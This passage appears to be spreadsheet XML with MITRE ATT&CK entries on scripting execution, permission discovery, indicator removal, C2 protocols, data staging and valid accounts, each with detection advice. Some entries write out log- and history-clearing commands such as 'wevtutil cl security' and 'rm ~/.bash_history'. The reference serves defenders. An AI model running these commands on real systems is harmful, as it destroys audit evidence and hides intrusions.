    <t>Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Understanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent.</t>
  </si>
  <si>
    <t>Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.</t>
  </si>
  <si>
    <t>T1059.006</t>
  </si>
  <si>
    <t>Python</t>
  </si>
  <si>
    <t>System calls,Process monitoring,Process command-line parameters,API monitoring</t>
  </si>
  <si>
    <t>Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives.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</si>
  <si>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Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the &lt;code&gt;python.exe&lt;/code&gt; interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.
Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.</t>
  </si>
  <si>
    <t>T1059.007</t>
  </si>
  <si>
    <t>JavaScript/JScript</t>
  </si>
  <si>
    <t>Loaded DLLs,DLL monitoring,File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.</t>
  </si>
  <si>
    <t>Adversaries may abuse JavaScript and/or JScript for execution. JavaScript (JS) is a platform-agnostic scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)
Adversaries may abuse JavaScript / JScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).</t>
  </si>
  <si>
    <t>T1059.008</t>
  </si>
  <si>
    <t>Network Device CLI</t>
  </si>
  <si>
    <t>Network device logs,Network device run-time memory,Network device command history,Network device configuration</t>
  </si>
  <si>
    <t>Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.(Citation: Cisco IOS Software Integrity Assurance - Command History)
Consider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.</t>
  </si>
  <si>
    <t>Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. 
Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or secure shell (SSH).
Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution)</t>
  </si>
  <si>
    <t>Graphical User Interface</t>
  </si>
  <si>
    <t>Detection of execution through the GUI will likely lead to significant false positives. Other factors should be considered to detect misuse of services that can lead to adversaries gaining access to systems through interactive remote sessions. 
Unknown or unusual process launches outside of normal behavior on a particular system occurring through remote interactive sessions are suspicious. Collect and audit security logs that may indicate access to and use of Legitimate Credentials to access remote systems within the network.</t>
  </si>
  <si>
    <t>**This technique has been deprecated. Please use [Remote Services](https://attack.mitre.org/techniques/T1021) where appropriate.**
The Graphical User Interfaces (GUI) is a common way to interact with an operating system. Adversaries may use a system's GUI during an operation, commonly through a remote interactive session such as [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076), instead of through a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), to search for information and execute files via mouse double-click events, the Windows Run command (Citation: Wikipedia Run Command), or other potentially difficult to monitor interactions.</t>
  </si>
  <si>
    <t>Hypervisor</t>
  </si>
  <si>
    <t>System calls</t>
  </si>
  <si>
    <t>Type-1 hypervisors may be detected by performing timing analysis. Hypervisors emulate certain CPU instructions that would normally be executed by the hardware. If an instruction takes orders of magnitude longer to execute than normal on a system that should not contain a hypervisor, one may be present. (Citation: virtualization.info 2006)</t>
  </si>
  <si>
    <t>**This technique has been deprecated and should no longer be used.**
A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption.</t>
  </si>
  <si>
    <t>persistence</t>
  </si>
  <si>
    <t>Scripting</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Scripting may be common on admin, developer, or power user systems, depending on job function.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
Analyze Office file attachments for potentially malicious macros. Execution of macros may create suspicious process trees depending on what the macro is designed to do. Office processes, such as winword.exe, spawning instances of cmd.exe, script application like wscript.exe or powershell.exe, or other suspicious processes may indicate malicious activity. (Citation: Uperesia Malicious Office Documents)</t>
  </si>
  <si>
    <t>**This technique has been deprecated. Please use [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.**
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[PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts.
Scripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.
Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)</t>
  </si>
  <si>
    <t>defense-evasion,execution</t>
  </si>
  <si>
    <t>Process whitelisting,Data Execution Prevention,Exploit Prevention</t>
  </si>
  <si>
    <t>Exploitation for Privilege Escalation</t>
  </si>
  <si>
    <t>Windows Error Reporting,Process monitoring,Application logs</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</si>
  <si>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or evidence of Discovery.
Higher privileges are often necessary to perform additional actions such as some methods of [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges.</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities in an attempt to collect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may be a necessary step for an adversary compromising a endpoint system that has been properly configured and limits other privilege escalation methods.</t>
  </si>
  <si>
    <t>privilege-escalation</t>
  </si>
  <si>
    <t>Permission Groups Discovery</t>
  </si>
  <si>
    <t>Stackdriver logs,GCP audit logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,Office 365,Azure AD,AWS,GCP,Azure,SaaS</t>
  </si>
  <si>
    <t>Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.</t>
  </si>
  <si>
    <t>T1069.001</t>
  </si>
  <si>
    <t>Local Groups</t>
  </si>
  <si>
    <t>Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
Commands such as &lt;code&gt;net localgroup&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscl . -list /Groups&lt;/code&gt; on macOS, and &lt;code&gt;groups&lt;/code&gt; on Linux can list local groups.</t>
  </si>
  <si>
    <t>T1069.002</t>
  </si>
  <si>
    <t>Domain Groups</t>
  </si>
  <si>
    <t>Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
Commands such as &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility,  &lt;code&gt;dscacheutil -q group&lt;/code&gt; on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain-level groups.</t>
  </si>
  <si>
    <t>T1069.003</t>
  </si>
  <si>
    <t>Cloud Groups</t>
  </si>
  <si>
    <t>GCP audit logs,Stackdriver logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Office 365,Azure AD,GCP,SaaS,Azure,AWS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</si>
  <si>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Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.</t>
  </si>
  <si>
    <t>Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
With authenticated access there are several tools that can be used to find permissions groups. The &lt;code&gt;Get-MsolRole&lt;/code&gt; PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts.(Citation: Microsoft Msolrole)(Citation: GitHub Raindance)
Azure CLI (AZ CLI) also provides an interface to obtain permissions groups with authenticated access to a domain. The command &lt;code&gt;az ad user get-member-groups&lt;/code&gt; will list groups associated to a user account.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)</t>
  </si>
  <si>
    <t>Indicator Removal on Host</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,API monitoring,Windows event logs</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files.  Events not stored on the file system may require different detection mechanisms.</t>
  </si>
  <si>
    <t>Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and /var/log/*.
These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This that may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.</t>
  </si>
  <si>
    <t>Log analysis,Host intrusion prevention systems,Anti-virus</t>
  </si>
  <si>
    <t>T1070.001</t>
  </si>
  <si>
    <t>Clear Windows Event Logs</t>
  </si>
  <si>
    <t>API monitoring,Process command-line parameters,Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>Deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft Clear-EventLog)) may also generate an alterable event (Event ID 1102: "The audit log was cleared").</t>
  </si>
  <si>
    <t>Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.
The event logs can be cleared with the following utility commands:
* &lt;code&gt;wevtutil cl system&lt;/code&gt;
* &lt;code&gt;wevtutil cl application&lt;/code&gt;
* &lt;code&gt;wevtutil cl security&lt;/code&gt;
These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>Anti Virus,Host Intrusion Prevention Systems,Log Analysis</t>
  </si>
  <si>
    <t>T1070.002</t>
  </si>
  <si>
    <t>Clear Linux or Mac System Logs</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files. Also monitor for suspicious processes interacting with log files.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the &lt;code&gt;/var/log/&lt;/code&gt; directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
* &lt;code&gt;/var/log/messages:&lt;/code&gt;: General and system-related messages
* &lt;code&gt;/var/log/secure&lt;/code&gt; or &lt;code&gt;/var/log/auth.log&lt;/code&gt;: Authentication logs
* &lt;code&gt;/var/log/utmp&lt;/code&gt; or &lt;code&gt;/var/log/wtmp&lt;/code&gt;: Login records
* &lt;code&gt;/var/log/kern.log&lt;/code&gt;: Kernel logs
* &lt;code&gt;/var/log/cron.log&lt;/code&gt;: Crond logs
* &lt;code&gt;/var/log/maillog&lt;/code&gt;: Mail server logs
* &lt;code&gt;/var/log/httpd/&lt;/code&gt;: Web server access and error logs
</t>
  </si>
  <si>
    <t>T1070.003</t>
  </si>
  <si>
    <t>Clear Command History</t>
  </si>
  <si>
    <t>Process command-line parameters,PowerShell logs,File monitoring,Authentication logs</t>
  </si>
  <si>
    <t>User authentication, especially via remote terminal services like SSH, without new entries in that user's &lt;code&gt;~/.bash_history&lt;/code&gt; is suspicious. Additionally, the removal/clearing of the &lt;code&gt;~/.bash_history&lt;/code&gt; file can be an indicator of suspicious activity.
Monitor for suspicious modifications or deletion of &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; and use of the &lt;code&gt;Clear-History&lt;/code&gt; command.</t>
  </si>
  <si>
    <t>In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, these command histories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Adversaries may delete their commands from these logs by manually clearing the history (&lt;code&gt;history -c&lt;/code&gt;) or deleting the bash history file &lt;code&gt;rm ~/.bash_history&lt;/code&gt;.
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the &lt;code&gt;PSReadLine&lt;/code&gt; module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
The &lt;code&gt;PSReadLine&lt;/code&gt; command history tracks the commands used in all PowerShell sessions and writes them to a file (&lt;code&gt;$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt&lt;/code&gt; by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
Adversaries may run the PowerShell command &lt;code&gt;Clear-History&lt;/code&gt; to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; file. Adversaries may also delete the &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)</t>
  </si>
  <si>
    <t>Host forensic analysis,Log analysis</t>
  </si>
  <si>
    <t>T1070.004</t>
  </si>
  <si>
    <t>File Deletion</t>
  </si>
  <si>
    <t>Binary file metadata,Process command-line parameters,File monitoring</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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary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 Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)</t>
  </si>
  <si>
    <t>T1070.005</t>
  </si>
  <si>
    <t>Network Share Connection Removal</t>
  </si>
  <si>
    <t>Authentication logs,Packet capture,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of &lt;code&gt;net use&lt;/code&gt; commands associated with establishing and removing remote shares over SMB, including following best practices for detection of [Windows Admin Shares](https://attack.mitre.org/techniques/T1077). SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.</t>
  </si>
  <si>
    <t>Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the &lt;code&gt;net use \\system\share /delete&lt;/code&gt; command. (Citation: Technet Net Use)</t>
  </si>
  <si>
    <t>T1070.006</t>
  </si>
  <si>
    <t>Timestomp</t>
  </si>
  <si>
    <t>Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.</t>
  </si>
  <si>
    <t>Adversaries may modify file time attributes to hide new or changes to existing files. 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[Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)</t>
  </si>
  <si>
    <t>Application Layer Protocol</t>
  </si>
  <si>
    <t>DNS records,Network protocol analysis,Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. </t>
  </si>
  <si>
    <t>T1071.001</t>
  </si>
  <si>
    <t>Web Protocols</t>
  </si>
  <si>
    <t>Network protocol analysis,Process monitoring,Process use of network,Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t xml:space="preserve">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
Monitor for web traffic to/from known-bad or suspicious domains. </t>
  </si>
  <si>
    <t xml:space="preserve">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 and HTTPS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t>
  </si>
  <si>
    <t>T1071.002</t>
  </si>
  <si>
    <t>File Transfer Protocols</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</si>
  <si>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used.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as FTP, FTPS, and TFTP that transfer files may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </t>
  </si>
  <si>
    <t>T1071.003</t>
  </si>
  <si>
    <t>Mail Protocols</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </t>
  </si>
  <si>
    <t>T1071.004</t>
  </si>
  <si>
    <t>DNS</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,DNS records,Process monitoring,Process use of network,Packet capture</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</si>
  <si>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
Monitor for DNS traffic to/from known-bad or suspicious domains.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) </t>
  </si>
  <si>
    <t>Software Deployment Tools</t>
  </si>
  <si>
    <t>Authentication logs,File monitoring,Third-party application logs,Windows Registry,Process monitoring,Process use of network,Binary file metadata</t>
  </si>
  <si>
    <t>Detection methods will vary depending on the type of third-party software or system and how it is typically used. 
The same investigation process can be applied here as with other potentially malicious activities where the distribution vector is initially unknown but the resulting activity follows a discernible pattern. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems. 
Often these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Ensure that third-party application logs are on-boarded to the enterprise logging system and the logs are regularly reviewed. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious. Monitor account login activity on these applications to detect suspicious/abnormal usage.
Perform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.</t>
  </si>
  <si>
    <t>Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.).
Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.
The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.</t>
  </si>
  <si>
    <t>execution,lateral-movement</t>
  </si>
  <si>
    <t>Data Staged</t>
  </si>
  <si>
    <t>Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.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Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>Adversaries may stage collected data in a central location or directory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location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.</t>
  </si>
  <si>
    <t>T1074.001</t>
  </si>
  <si>
    <t>Local Data Staging</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>T1074.002</t>
  </si>
  <si>
    <t>Remote Data Staging</t>
  </si>
  <si>
    <t>Adversaries may stage data collected from multiple systems in a central location or directory on one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In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.</t>
  </si>
  <si>
    <t>Valid Accounts</t>
  </si>
  <si>
    <t>AWS CloudTrail logs,Stackdriver logs,Authentication logs,Process monitoring</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,AWS,GCP,Azure,SaaS,Office 365,Azure AD</t>
  </si>
  <si>
    <t>Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: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Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.</t>
  </si>
  <si>
    <t>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and remote desktop.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 (Citation: TechNet Credential Theft)</t>
  </si>
  <si>
    <t>defense-evasion,persistence,privilege-escalation,initial-access</t>
  </si>
  <si>
    <t>Firewall,Host intrusion prevention systems,Network intrusion detection system,Application control,System access controls,Anti-virus</t>
  </si>
  <si>
    <t>T1078.001</t>
  </si>
  <si>
    <t>Default Accounts</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,AWS,GCP,Azure,Office 365,Azure AD,SaaS</t>
  </si>
  <si>
    <t>Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems or default factory/provider set accounts on other types of systems, software, or devices.(Citation: Microsoft Local Accounts Feb 2019)
Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)</t>
  </si>
  <si>
    <t>T1078.002</t>
  </si>
  <si>
    <t>Domain Accounts</t>
  </si>
  <si>
    <t>Authentication logs,Process monitoring</t>
  </si>
  <si>
    <t>Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: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Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.</t>
  </si>
  <si>
    <t>T1078.003</t>
  </si>
  <si>
    <t>Local Accounts</t>
  </si>
  <si>
    <t>Authentication logs</t>
  </si>
  <si>
    <t>Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.
Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. </t>
  </si>
  <si>
    <t>T1078.004</t>
  </si>
  <si>
    <t>Cloud Accounts</t>
  </si>
  <si>
    <t>Azure activity logs,Authentication logs,AWS CloudTrail logs,Stackdriver logs</t>
  </si>
  <si>
    <t>AWS,GCP,Azure,SaaS,Azure AD,Office 365</t>
  </si>
  <si>
    <t>Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours.</t>
  </si>
  <si>
